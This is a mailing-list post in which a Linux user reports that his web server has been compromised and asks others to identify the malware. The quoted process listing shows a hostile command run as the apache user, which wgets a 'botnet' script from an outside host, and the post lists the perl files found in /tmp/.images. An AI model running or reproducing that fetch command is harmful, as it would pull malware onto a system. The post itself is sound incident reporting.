I found that something was sucking up all my bandwidth late
this morning.  ps -aux showed this:

apache    3267  0.0  0.0   2560  1024 ?        S    11:14   0:00 sh -c wget 
leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1
apache    3268  0.0  0.1   3060  1460 ?        S    11:14   0:00 wget 
leblocks.sytes.net/botnet
apache    3269  0.0  0.0   1416   448 ?        S    11:14   0:00 grep abcdeee

After killing all processes owned by apache and doing a bit
of checking around, I found these perl scripts in
/tmp/.images:

-rw-r--r--   1 apache apache 20281 Feb 15 12:13 botnet
-rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv
-rw-r--r--   1 apache apache  9592 Oct 12 23:23 pv.1

They are definitely malicious.  Does anyone know what this
malware is?

-- Rod
_______________________________________________
vox-tech mailing list
vox-tech@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox-tech

Reply via email to